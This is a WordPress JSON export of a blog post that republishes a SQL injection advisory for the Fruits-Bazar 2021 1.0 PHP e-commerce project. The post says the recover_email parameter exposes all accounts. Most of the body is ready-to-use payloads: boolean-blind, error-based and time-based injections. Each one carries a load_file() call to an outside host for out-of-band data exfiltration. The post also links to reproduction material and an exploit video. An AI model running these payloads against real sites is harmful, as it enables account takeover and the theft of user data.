{"id":26341,"date":"2022-06-30T00:39:34","date_gmt":"2022-06-29T20:39:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167617\/fruitsbazar202110-sql.txt"},"modified":"2022-07-04T12:59:08","modified_gmt":"2022-07-04T08:29:08","slug":"fruits-bazar-2021-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/fruits-bazar-2021-1-0-sql-injection\/","title":{"rendered":"Fruits-Bazar 2021 1.0 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\">## Title: Fruits-Bazar 2021 v1.0 SQLi<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 06.29.2022<br \/>\n## Vendor: https:\/\/github.com\/creativesaiful<br \/>\n## Software: https:\/\/github.com\/creativesaiful\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Md-Saiful-Islam-creativesaiful\/2021\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe recover_email parameter appears to be vulnerable to SQL injection attacks.<br \/>\nThe attacker can gain access to all accounts on this system.<br \/>\nStatus: CRITICAL<\/p>\n<p dir=\"ltr\">[+] Payloads:<\/p>\n<p dir=\"ltr\">```mysql<br \/>\n&#8212;<br \/>\nParameter: recover_email (POST)<br \/>\nType: boolean-based blind<br \/>\nTitle: OR boolean-based blind &#8211; WHERE or HAVING clause (NOT)<br \/>\nPayload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\\\olg&#8217;))+&#8221;<br \/>\nOR NOT 9177=9177 AND &#8216;HeFM&#8217;=&#8217;HeFM&amp;u_pass_recover=Recover Password<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL &gt;= 5.0 AND error-based &#8211; WHERE, HAVING, ORDER BY or<br \/>\nGROUP BY clause (FLOOR)<br \/>\nPayload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net&#8217;+(select<br 
\/>\nload_file(&#8216;\\\\\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\\\olg&#8217;))+&#8221;<br \/>\nAND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT<br \/>\n(ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM<br \/>\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND<br \/>\n&#8216;Mvga&#8217;=&#8217;Mvga&amp;u_pass_recover=Recover Password<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\\\olg&#8217;))+&#8221;<br \/>\nAND (SELECT 4612 FROM (SELECT(SLEEP(5)))vECZ) AND<br \/>\n&#8216;qfSm&#8217;=&#8217;qfSm&amp;u_pass_recover=Recover Password<br \/>\n&#8212;<\/p>\n<p dir=\"ltr\">```<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Md-Saiful-Islam-creativesaiful\/2021\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/ngodwj)<\/p>\n<p dir=\"ltr\">&#8212;<br \/>\nSystem Administrator &#8211; Infrastructure Engineer<br \/>\nPenetration Testing Engineer<br \/>\nExploit developer at https:\/\/packetstormsecurity.com\/<br \/>\nhttps:\/\/cve.mitre.org\/index.html and https:\/\/www.exploit-db.com\/<br \/>\nhome page: https:\/\/www.nu11secur1ty.com\/<br \/>\nhiPEnIMR0v7QCo\/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br \/>\nnu11secur1ty &lt;http:\/\/nu11secur1ty.com\/&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: Fruits-Bazar 2021 v1.0 SQLi ## Author: nu11secur1ty ## Date: 06.29.2022 ## Vendor: https:\/\/github.com\/creativesaiful ## Software: https:\/\/github.com\/creativesaiful\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar- ## Reference: 
https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Md-Saiful-Islam-creativesaiful\/2021\/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar ## Description: The recover_email parameter appears to be vulnerable to SQL injection attacks. The attacker can gain access to all accounts on this system. Status: CRITICAL [+] Payloads: &#8220;`mysql &#8212; Parameter: recover_email (POST) Type: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-26341","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26341","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=26341"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26341\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=26341"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=26341"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=26341"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}